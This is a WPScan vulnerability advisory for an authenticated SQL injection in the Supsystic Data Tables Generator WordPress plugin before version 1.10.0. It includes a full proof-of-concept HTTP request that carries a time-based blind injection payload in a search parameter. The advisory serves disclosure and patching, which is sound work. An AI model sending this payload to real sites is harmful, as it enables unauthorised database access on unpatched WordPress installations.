WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Data Tables Generator by Supsystic < 1.10.0 - Authenticated SQL Injection

Description

The POST parameter "data[search][text_like]" was used in a SQL statement without being sanitised when searching for Tables in the dashboard, leading to an authenticated SQL Injection issue.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=supsystic-tables&module=tables&nonce=6cda51eefd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 336
Origin: https://example.com
Connection: close
Cookie: [admin cookies]

route%5Bmodule%5D=tables&route%5Baction%5D=getListForTbl&route%5Bnonce%5D=6cda51eefd&data%5Bsearch%5D%5Btext_like%5D=aa'%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)%20AND%20'42'='42&data%5B_search%5D=false&data%5Bnd%5D=1612792425884&data%5Brows%5D=10&data%5Bpage%5D=0&data%5Bsidx%5D=id&data%5Bsord%5D=desc&action=supsystic-tables

Affects Plugins

data-tables-generator-by-supsystic
Fixed in version 1.10.0

References

ExploitDB
49543

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Erik David Martin

Verified

Yes

WPVDB ID
117bb262-133d-4117-b279-b5483efb6810

Timeline

Publicly Published

2021-02-08 (about 2 years ago)

Added

2021-02-08 (about 2 years ago)

Last Updated

2021-02-10 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin